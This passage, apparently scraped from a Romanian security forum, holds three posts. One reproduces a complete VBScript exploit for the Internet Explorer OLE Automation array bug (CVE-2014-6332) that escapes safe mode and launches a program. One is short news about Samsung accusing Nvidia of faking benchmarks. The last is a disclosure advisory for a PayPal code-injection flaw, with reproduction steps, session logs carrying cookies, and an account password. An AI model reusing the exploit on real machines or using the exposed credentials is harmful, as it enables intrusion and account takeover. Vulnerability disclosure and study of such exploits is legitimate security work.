</body> </html> EOS print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Surs?: Internet Explorer OLE Automation Array Remote Code Execution (msf)
  18. //* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Surs?: http://www.exploit-db.com/exploits/35229/
  19. Asa cum spune si titlul, Samsung s-a suparat pe nVidia. Motivul ar fi ca platforma Tegra K1 scoate un rezultat mai bun decat platforma Exynos 5433, iar Samsung considera acest lucru o minciuna si se bat cu pumnul in piept ca ei sunt mai buni, si ca nVidia triseaza. Sa nu uitam ca si Samsung a avut probleme in trecut cu testele falsificate, iar acum acestia ii acuza pe altii. Se pare ca platforma Tegra K1, platforma ce se regaseste si in noua tableta Google Nexus 9 produsa de HTC, scoate un scor mai mare decat platforma celor de la Samsung, Exynos 5433, ce se regaseste in Galaxy Note 4, testat de noi aici. Samsung sustinte ca chip-ul lor este mai bun si ca nVidia a falsificat rezultatul. Tegra K1 a scos cu 1500 de puncte mai mult, lucru care ia enervat pe sud-coreeni. In plus, Samsung a mai dat in judecata nVidia si pentru 6 brevete folosita fara licenta. nVidia a spus doar ca chip-ul lor este mai bun si atat. Ramane de vazut ce se va intampla in viitor. Surs?: Samsung a dat in judecata nVidia pentru falsificarea benchmark-urilor | Arena IT
  20. PayPal suffered from an arbitrary code execution vulnerability. A filter bypass and persistent bug was also discovered during the testing of the same vulnerable parameter location. Document Title: =============== PayPal Inc - Filter Bypass & Arbitrary Code Execution Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=936 Video: http://www.vulnerability-lab.com/get_content.php?id=1275 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2014/11/05/paypal-inc-fixed-filter-bypass-profile-code-execution-during-infrastructure Release Date: ============= 2014-11-05 Vulnerability Laboratory ID (VL-ID): ==================================== 936 Common Vulnerability Scoring System: ==================================== 9.1 Product & Service Introduction: =============================== PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a persistent script code injection web vulnerability in the official PayPal Inc core application. Vulnerability Disclosure Timeline: ================================== 2013-04-25: Researcher Notification & Coordination (PayPal Inc - Bug Bounty Program) 2013-04-26: Vendor Notification (PayPal Inc - Bug Bounty Program) 2013-05-01: Vendor Response/Feedback (PayPal Inc - Bug Bounty Program) 2013-09-12: Vendor Response/Feedback (Ebay Inc - Bug Bounty Program) 2014-10-01: Vendor Response/Feedback (Ebay Inc - Bug Bounty Program) 2014-10-12: Vendor Fix/Patch (PayPal Inc - Developer Team) 2014-11-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PayPal Inc Product: Core Application 2013 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A system specific arbitrary code execution vulnerability has been discovered in the official in the official PayPal Inc Web-Application & API. A filter bypass and persistent bug has also been revealed during the tests in the same vulnerable parameter location. The system specific arbitrary code execution vulnerability is located in the developer api portal with connection and account access to the paypal portal api. First the attacker registers an user account and includes to the `cardholder confidential` and `accountSelName` value own malicious persistent script codes or local web-server files. To attack, the help center data of the malicious profile requires a second registration to the developer api portal with same credentials (connected). The accountSelName and the confidential values are not limited on input. The attacker is able to load script codes but can also remotly execute arbitrary codes to access local web-server files or configs. The filter bypass occurs during the execution onclick by opening the profile. The trusted context of the dev api user account will be streamed through the help center link on GET method requests. The regular filter of paypal prevents the external inject of frames to other websites but in case of this issue the trusted context is directly executed on top of the profile. The execution and inject can occur remotly by attackers and the attack typus is pending from persistent xss to arbitrary code execution and local web-server file request through the profile. The web-server and misconfiguration allows the attacker to for example include a frame with a local request through the trusted context to capture unauthorized data of the system. A webshell inject could also be possible during the execution point of the paypal users profile. The attack vector is on the application-side of the paypal service and the injection request method is POST (dev api & help center). The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 9.1. Exploitation of the system specific code execution vulnerability requires a low privileged paypal inc account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific codes, webshell injects via POST method, unauthorized path/file value requests to compromise the application or the connected module components. Request Method(s): [+] POST Vulnerable Module(s): [+] helpcenter/home/ ( https://www.paypal.com/webapps/helpcenter/home/ ) [+] developer.paypal.com ( https://developer.paypal.com/webapps/developer/support ) Vulnerable Parameter(s): [+] accountSelName confidential [+] confidential Affected Module(s): [+] PayPal Inc – Profile User Index (Main) – Execution through > https://developer.paypal.com/webapps/developer/support ) Proof of Concept (PoC): ======================= The system specific code execution and persistent issue (filter bypass) can be exploited by remote attackers with low privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual Steps to reproduce the vulnerability ... 1. First register and account to the developer portal api 2. Second connect the paypal account to the help center by registration (2. to 1. also possible) Note: On registration it`s required to include own payloads (code execution [path|file|config]or script code[html|php|js]) to the AccountSelName & cardholder confidential input. 3. Save the payload to your profile 4. Open the dev webportal & include the same data (payload) to your dev api profile values. Note: On our tests we did but we are not if this is a requirement for a successful test. 5. Now surf to the following internal dev websitehttps://developer.paypal.com/webapps/developer/support ) Note: On bottom of the page is now the paypal support link with the malicious injected code 6. Click the "Visit PayPal Support" link 7. The website redirect to the local paypal profile with the new api template theme. The system specific code execution occurs directly in the middle were the streamed data of the helpcenter through dev api portal will become visible. The vulnerable executable values are `AccountSelName` and cardholder `confidential` account data. Note: If you injected script code the script code execution on the main profile request throught the dev api service or a local config/file of the web-server will be loaded. 8. Successful reproduce of the remote vulnerability in the paypal infrastructure! Note: DETAILS $ PAYPAL TO AUTHORIZED USAGE Reference(s): >From < https://developer.paypal.com/webapps/developer/support Through API > https://www.paypal.com/webapps/helpcenter/home/ To < https://www.paypal.com/webapps/helpcenter/home/a [ARBITRARY CODE EXEUCTION!] PoC: Help Center Index - confidential & accountSelName confidential <div class="nav product merchant"> <div class="wrapper"> <div class="column_8_16" style="clear:both"> <div class="one column"> <div class="accountSelName confidential"> <div class="confidential" tabindex="0">%20>>"<<x>%20%20%20%20"><i... #[SYSTEM SPECIFIC CODE EXECUTION OR PERSISTENT SCRIPT CODE!] </div> </div> Note: Code snippet poc shows the execution of the code after the inject of the test payloads --- PoC-Session Logs [GET] (Vulnerable Service) --- 22:28:56.757[1073ms][total 1933ms] Status: 200[OK] GET https://developer.paypal.com/webapps/developer/support Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[2841] Mime Type[text/html] Request Headers: Host[developer.paypal.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[https://developer.paypal.com/webapps/developer/dashboard/test] Cookie[cookie_check=yes; analytics=npXj01hCUWhDymxVPXy6hvRAO8mp6Vab7grsAxepOdYMdbZuOAokBTznGTV664Cfp6JTxQWQSk; s_sess=%20c_m%3DNatural %2520Searchpaypal%2520bug%2520bountywww.google.de%3B%20s_cc%3Dtrue%3B%20s_ppv %3D0%3B%20tr_p1%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl%252Fdust %252Fdashboard%252Ftest.dust%3B%20v31%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl %252Fdust%252Fdashboard%252Ftest.dust%3B%20lt%3DSupport%255Edeveloperspartaweb %252Fweb-inf%252Ftmpl%252Fdust%252Fdashboard%252Ftest.dust%3B%20s_sq %3Dpaypalglobal%253D%252526pid%25253Ddeveloperspartaweb%2525252Fweb-inf %2525252Ftmpl%2525252Fdust%2525252Fdashboard%2525252Ftest.dust%252526pidt %25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fdeveloper.paypal.com %2525252Fwebapps%2525252Fdeveloper%2525252Fsupport%252526ot%25253DA%3B; s_pers= %20gpv_p23%3Dmain%253Amktg%253Afinancing%253A%253Aunauthhome %7C1367009015468%3B%20s_fid%3D1C1953F2CF9A8631-0C78EF476327828D %7C1430080136714%3B%20gpv_c43%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl %252Fdust%252Fdashboard%252Ftest.dust%7C1367009936721%3B%20gpv_events%3Dno %2520value%7C1367009936725%3B; ts=vreXpYrS%3D1461678158%26vteXpYrS %3D1367009181%26vr%3D47e0e1a413e0abe0d4d0d4d0ff0230cd%26vt %3D47e0e1a413e0abe0d4d0d4d0ff0230cc; cwrClyrK4LoCV1fydGbAxiNL6iG=m_WedegyrDKHFdAAufD7kF5ZU6s7aO3eJRms9TW1Aqb MaEGDtkxeY34Bm2p_Hdeq87Nxhr5c1NNBdvfBaH9eMflpanT_YGvgX2nIWI1r5A6hgqXnwf1V sas9ZF4%7cZzbBc9qDQDohlW04oVtWtiOWLr9U0WKE6S2A0PnGDPPGjZse1c2PabDnan_fh5z WNuEDFW%7cW-RHDrQRl1Z61RvfQtyKpy9zn2aU_q7vM0hMlqljwNAfggMISaWNpeW46G8lM5Cj0urp0% 7c1367007376; KHcl0EuY7AKSMgfvHl7J5E7hPtK=SaayQldii2iWrbaXFREEUkHzBgkDKOXS4yTeJTgI6fzQphzAG805W5l2oPSNYVPXDKaZsIUSCGQp_3; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE %3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE %3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID %3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP %3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1%26USER_GROUP %3d4294967295%26FORGOT_BUTTON_ROLE%3d56; Apache=10.74.8.156.1367005659167493; __utma=263370009.199482976.1367005657.1367005657.1367005657.1; __utmb=263370009.14.10.1367005657; __utmc=263370009; __utmz=263370009.1367005657.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); agzvbiaTG7XC5VaEwLQYUwrb15G=r_szrtUuBwYD4NqoIw8h2WUjW3vVbgmkVo4nfph5BOD dMpHqO7lRZspuKjGAkR9z7t5bcKMLzkdtsatoh2iXm7MHYjLBOvx1rt8VVCMfVPPtg6_InRirel fXNFERKV_Igy_kOgIqyiR4oRcZLDSiIvaS8gle7qLylyTdX5v4aOgK_sAq9E24anwk7d_myT6CX UbQb-R7NqyzMw8VUepjHqSlwNyPKJghSDFGaCHdD3QjksqJQv0q9htdG0JWAQv2oHLs7G;g2bQrGu-- VIan06DHlaPDvMaBlO=E1iMJrsOOEL1cS_wHh1vvEmVHLFgVwqSZqUhJUuCJE4oazlBhxlB_ LpJ58GLANkKI5mfJmWwTdSARHKKlkoLbta2DzCBbSfQrwMrghrYzYq_ EuJAqV7lFBbj_KP8osHKEfkaCVs34_XfppcGWgfledkmJwyk M7mKxcPYdUTJlvDcNy2sbQiMWhHTh2dhEe_ 6re9gZQFjXSy6i979Lbe2UWIPZZnBCXVoMsHD0xbkgEnJqh4Bi11zJc4tS1FChXzd niWkLTx17WhTjbpyVNE7O-wtjO9-5StitWI3azzMJTlAkA3eBtfw0yhaB70fFCpba_ yENriXQtKsJGcXAm71RAiJwiJEWBkq6iZpqkleEK69- Q6YP1NY0Dp0B1531BjYZBrZbOAUh8m0X3_Z1- _RddBXIrU4vnShqZgZworf2okBA7IvMfzWfyv0OfB3aLkd8xtrLCFDgdNBVERHwWHYb7_Mf EUNJ-6JqM4koqIvLZvDDo9_DCdpfKdwTRu9vQtiB3GaRx7DgVqkOMEtxSJljmPz1HDDtC15cW; HaC80bwXscjqZ7KM6VOxULOB534=JfvaMWVy2cPSO5bSwbHiwUc2SJBueQbZ9CDRM3vWz xlwWnFYuoFw1sPOG8KCzk6wz61BNsMVTXCMIQZe2XogMzyRdMIjfgwT6uFt_ hD9krQVnGZvKKxHBuZd hDMHGcgesSeWG; login_email=x01445%40gmail.com; LANG=en_US%3bDE; Gws4LBnVhSMuyYhD0wXzh01SEK= jy0DcLqW37pTQNCEhLbqhA3QX00BcwiDqqaD7U13i0aMo BtISTVSGbl4WlJ-_eEVAsOLl501In5N_1HJBq88q1hBV5S; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoW iJtY1GnpzN4Y-sixGy7BQ; navcmd=xpt%2fCustomer_Profile%2faccount%2fprofile %2fSellerPreference; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=GXKuXCGNvT1bsc_jz_Rx9E7VwmZZ8o3dbnxOVVVp9A axiyWkodDxxKi4R67QRG1M5Y9fj-Wu7wfuRhtJ7-4rEJoEX8JKpG40P- 26PMeKw49jPMtad4WGiZRQSoayGXMsc582PVSkcKSwR6h6qIuMqseWjoOmQyUcBhGpGD MpZCtdFnUeh7VG8LcUYDbLPeIrziGR7A8uFYcl2UoCzOmLGW9tjXHo849pblqKbUdA9GfnC6mXONIJL7SrRz7cZV2DeIRAUlytDT3bwKroKutZtMwkh9QxWAqJPu Y2l18_FhlA9bLZKcbu7Hwv7-CKt4s9rk2RAfVkMUxcdUC6BxHn-5nAixQTO8fJ1Sxvm; navlns=0.0; INSIDE_SEARCH_PARAMS=2%3bDE%3ben_US%3bEurope%2fBerlin; SPARTAJSESSIONID=b469ade995520] Connection[keep-alive] Response Headers: Date[Fri, 26 Apr 2013 20:29:00 GMT] Server[Apache-Coyote/1.1] X-Frame-Options[SAMEORIGIN] Cache-Control[must-revalidate, proxy-revalidate, no-cache] Content-Type[text/html;charset=utf-8] Content-Language[en-US] Set-Cookie[SPARTAJSESSIONID=b469ade995520; Domain=.paypal.com; Path=/; Secure; HttpOnly HaC80bwXscjqZ7KM6VOxULOB534=NeCv0LpChVSb1LUO7ACci9QljSszvP1vnFucjnzDEhQA aIJwnTGse_O1jK-v1Ix3xMf37CJzCo7mhHFiUqc_jGQ3TZCkyKw7bqsFSXjVmp1At- QfPpYWWvNBLJ-jwrRCxbkqbW; Domain=.paypal.com; Path=/; Secure; HttpOnly analytics=WlpqNFIvc5KQfH.5mTE.EHaym1WQXGmbYji.0XQm- CqpTh.7j5T5WuK2VeQdeoFYVDMJ0N41Q6M; Max-Age=631138519; Expires=Tue, 26-Apr- 2033 16:44:19 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly SPARTAJSESSIONIDV2=vsEpz8V5yOevktiKlA9Pf7Y6Dqji8U9YEYTL. 2fIuBwSPPV1H3jNv3FOduHGSyqmykhcIaPtx0; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[2841] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Note: The session log above with the GET method request shows the request which leads to the execution in the next session-log. The server accepts the malicious and manipulated request and redirects via referer and non expired session to the paypal.com portals were the execution occurs. --- PoC Session Logs [GET] (Execution) --- 22:29:06.862[3380ms][total 3380ms] Status: 200[OK] GET https://www.paypal.com/webapps/helpcenter/home/a Load Flags[LOAD_DOCUMENT_URI ] Content Size[5225] Mime Type[text/html] Request Headers: Host[www.paypal.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5]Accept-Encoding[gzip, deflate] DNT[1] Referer[https://www.paypal.com/webapps/helpcenter/home/] Cookie[Apache=10.73.8.62.1367005517929267; cookie_check=yes; analytics=YOCH0Lef0Klib5IKj7VGth- ESn2IJ5J4WqpvQFrb.if8hr8yIVWtwi260cfUTcb8QcddZn.uTdE; s_sess=%20c_m%3DNatural %2520Searchpaypal%2520bug%2520bountywww.google.de%3B%20s_cc%3Dtrue%3B %20tr_p1%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl%252Fdust%252Fsupport %252Foverview.dust%3B%20lt%3D%3B%20s_ppv%3D93%3B%20v31%3Ddeveloperspartaweb %252Fweb-inf%252Ftmpl%252Fdust%252Fsupport%252Foverview.dust%3B%20s_sq%3D%3B; s_pers=%20gpv_p23%3Dmain%253Amktg%253Afinancing%253A%253Aunauthhome %7C1367009015468%3B%20s_fid%3D1C1953F2CF9A8631-0C78EF476327828D %7C1430080143210%3B%20gpv_c43%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl %252Fdust%252Fsupport%252Foverview.dust%7C1367009943217%3B%20gpv_events%3Dno %2520value%7C1367009943221%3B; bn_u=1332619451692973419; ts=vreXpYrS %3D1461678158%26vteXpYrS%3D1367009181%26vr%3D47e0e1a413e0abe0d4d0d4d0ff0230cd %26vt%3D47e0e1a413e0abe0d4d0d4d0ff0230cc; cwrClyrK4LoCV1fydGbAxiNL6iG=m_WedegyrDKHFdAAufD7kF5ZU6s7aO3eJRms9TW1Aqb MaEGDtkxeY34Bm2p_Hdeq87Nxhr5c1NNBdvfBaH9eMflpanT_YGvgX2nIWI1r5A6hgqXnwf1V sas9ZF4%7cZzbBc9qDQDohlW04oVtWtiOWLr9U0WKE6S2A0PnGDPPGjZse1c2PabDnan_fh5z WNuEDFW%7cW-RHDrQRl1Z61RvfQtyKpy9zn2aU_q7vM0hMlqljwNAfggMISaWNpeW46G8lM5Cj0urp0% 7c1367007376; KHcl0EuY7AKSMgfvHl7J5E7hPtK=SaayQldii2iWrbaXFREEUkHzBgkDKOXS4yTeJTgI6fzQphzAG805W5l2oPSNYVPXDKaZsIUSCGQp_3; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE %3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE %3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID %3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP %3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1%26USER_GROUP %3d4294967295%26FORGOT_BUTTON_ROLE%3d56; agzvbiaTG7XC5VaEwLQYUwrb15G=r_szrtUuBwYD4NqoIw8h2WUjW3vVbgmkVo4nfph5BOD dMpHqO7lRZspuKjGAkR9z7t5bcKMLzkdtsatoh2iXm7MHYjLBOvx1rt8VVCMfVPPtg6_InRirel fXNFERKV_Igy_kOgIqyiR4oRcZLDSiIvaS8gle7qLylyTdX5v4aOgK_sAq9E24anwk7d_myT6CX UbQb-R7NqyzMw8VUepjHqSlwNyPKJghSDFGaCHdD3QjksqJQv0q9htdG0JWAQv2oHLs7G; g2bQrGu-- VIan06DHlaPDvMaBlO=E1iMJrsOOEL1cS_wHh1vvEmVHLFgVwqSZqUhJUuCJE4oazlBhxlB_ LpJ58GLANkKI5mfJmWwTdSARHKKlkoLbta2DzCBbSfQrwMrghrYzYq_ EuJAqV7lFBbj_KP8osHKEfkaCVs34_XfppcGWgfledkmJwyk M7mKxcPYdUTJlvDcNy2sbQiMWhHTh2dhEe_ 6re9gZQFjXSy6i979Lbe2UWIPZZnBCXVoMsHD0xbkgEnJqh4Bi11zJc4tS1FChXzd niWkLTx17WhTjbpyVNE7O-wtjO9-5StitWI3azzMJTlAkA3eBtfw0yhaB70fFCpba_ yENriXQtKsJGcXAm71RAiJwiJEWBkq6iZpqkleEK69- Q6YP1NY0Dp0B1531BjYZBrZbOAUh8m0X3_Z1- _RddBXIrU4vnShqZgZworf2okBA7IvMfzWfyv0OfB3aLkd8xtrLCFDgdNBVERHwWHYb7_Mf EUNJ-6JqM4koqIvLZvDDo9_DCdpfKdwTRu9vQtiB3GaRx7DgVqkOMEtxSJljmPz1HDDtC15cW; HaC80bwXscjqZ7KM6VOxULOB534=HP6WwQ0eXaRr2anoOsYKF7CGBw6- 5KhwiYVS1vwLn1Dh9NqoyWEOUWyUHVFtxavpSES_UYk7occE4X3uNtyj7nWnajz1VULGuV06AmM3jy13bLcpDK959inyPjrla7w1z- Ehm; login_email=x01445%40gmail.com; LANG=en_US%3bDE; Gws4LBnVhSMuyYhD0wXzh01SEK= jy0DcLqW37pTQNCEhLbqhA3QX00BcwiDqqaD7U13i0aMo BtISTVSGbl4WlJ-_eEVAsOLl501In5N_1HJBq88q1hBV5S; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoW iJtY1GnpzN4Y-sixGy7BQ; X-PP-SILOVER=name%3DLIVE6.WEB.1%26silo_version %3D880%26app%3Dslingshot%26TIME%3D2430368337; navcmd=xpt%2fCustomer_Profile %2faccount%2fprofile%2fSellerPreference; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=GXKuXCGNvT1bsc_jz_Rx9E7VwmZZ8o3dbnxOVVVp9A axiyWkodDxxKi4R67QRG1M5Y9fj-Wu7wfuRhtJ7-4rEJoEX8JKpG40P- 26PMeKw49jPMtad4WGiZRQSoayGXMsc582PVSkcKSwR6h6qIuMqseWjoOmQyUcBhGpGD MpZCtdFnUeh7VG8LcUYDbLPeIrziGR7A8uFYcl2UoCzOmLGW9tjXHo849pblqKbUdA9GfnC6mXONIJL7SrRz7cZV2DeIRAUlytDT3bwKroKutZtMwkh9QxWAqJPu Y2l18_FhlA9bLZKcbu7Hwv7-CKt4s9rk2RAfVkMUxcdUC6BxHn-5nAixQTO8fJ1Sxvm; navlns=0.0; INSIDE_SEARCH_PARAMS=2%3bDE%3ben_US%3bEurope%2fBerlin; tcs=main:identity:::newsso|_eventId_submit; SPARTAJSESSIONID=4381770a8d243; SPARTAJSESSIONIDV2=mFJuF3Td8YChLS8hsTBEDYCDlaan6SxOcEV8wCFmUQ37xGuQDc I25.tBKhyY-IJNPQ0A8Vw-GVXFZfQAHzqpFA; aksession=1367008449~id=cookievC+wdkyRC0UzSZWXkhBPD6dcl2wC6MkrXhAyCF24bXEAq a0oGE8xfvt3ph8bjykqTbPzZj330+q7qNHyIj42OcCxIikuXUl0QW1dPeeycH75828YbSSh5/VWmI MknMhGOK1SQUIF9uQ=] Connection[keep-alive] Response Headers: Server[Apache-Coyote/1.1] X-Frame-Options[SAMEORIGIN] Cache-Control[must-revalidate, proxy-revalidate, no-cache] Content-Type[text/html;charset=UTF-8] Content-Language[en-US] Content-Encoding[gzip] Content-Length[5225] Date[Fri, 26 Apr 2013 20:29:12 GMT] Connection[keep-alive] Vary[Accept-Encoding] Set-Cookie[SPARTAJSESSIONID=4381770a8d243; Domain=.paypal.com; Path=/; Secure; HttpOnlySPARTAJSESSIONID=4381770a8d243; Domain=.paypal.com; Path=/; Secure; HttpOnly HaC80bwXscjqZ7KM6VOxULOB534=67pQ_SbY9KcYXIZwvXf41F1UDHSPOlpuWZWBr5Syc RDYDMkpDjL9wnHZibXjZxPWxipETeT9OLSEDymNqzEsfdBbL_pDE1cnTJ2yiEUV1isdJqbcfq_ FgpHVutAELsNqqk7uG; Domain=.paypal.com; Path=/; Secure; HttpOnly analytics=0-AAbZ6STFaFViK65yobUytJf35vDfg1mxCQbONr6nxMY3v8tY97GBmh. rm.LWF9zJC4dJEEJs; Max-Age=631138519; Expires=Tue, 26-Apr-2033 16:44:31 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly SPARTAJSESSIONIDV2=wVm2OLjyw5F9VbwqocGR0TgDSghsfPAZXvCq1e1Aaap7fuaNiRX WFyBQE14Y1Em66vpfwGMDIo5ncV1LCDFYow; Domain=.paypal.com; Path=/; Secure; HttpOnly] Note: The session logs above shows that the server accepted (200OK) the request and answers with the malicious code execution (GET) as response to me as user. The service runs under the same origin policy which returns in the result of the dev through the help center. The execution can also be watched in the recorded research video for the paypal bug bounty issue #88. --- [ACCESS FOR PAYPAL] Sandbox to Live Help Center Service > Account: ***********@gmail.com password: merlin23 1.png The first image explains were the vulnerable location link has been placed after the inject for the further execution of the code during the exploitation-phase. The system specific code execution or persistent issue can be exploited by clicking the "Visit PayPal Support" link. 2.png The second images shows were the code execution occurs inside of the paypal inc webapps core and api. The code execution can be triggered by two vulnerable values via POST inject. To test we injected two payloads own frame and one local request of a web-server config file. The execution of the code occurs obviously next to the main user profile on index after the redirect to the referer. 3.png The third picture shows were the code execution and persistent issue with filter bypass is located. The vulnerable values are `confidential` and `accountSelName confidential`. Both values will be taken through the filter via referer on a redirect request with the same origin policy setup. The execution does not only allows to inject scipt codes for xss, the issue also allows an attacker to request local web-server files by the trusted same origin policy context request. 4.png The 4th image shows the session tamper details next to processing to clicking the link of the developer portal (api) to paypal.com (paypal). The tampered session through moziall shows that the server accepted the GET request with the further visible trusted context. The server responds with 200OK and directly executes the code through the paypal.com domain in the profile user top section. 5.png The 5th image shows were the code execution appears to become visible in the live session tamper. The domain https://www.paypal.com/webapps/helpcenter/home/a shows that the malicious inject was successfully because after the path ./helpcenter/home/[x] the code execution occurs after the filter bypass through the other services. 6.png The 6th images only shows that the attack vector of the issue in located on the application-side of the paypal inc online service. Proof for check was multiple GET requests during the test from the paypal database as user. Solution - Fix & Patch: ======================= A solution to fix the issue could be to parse all incoming values through the same origin policy configuration of the connected portal with the same 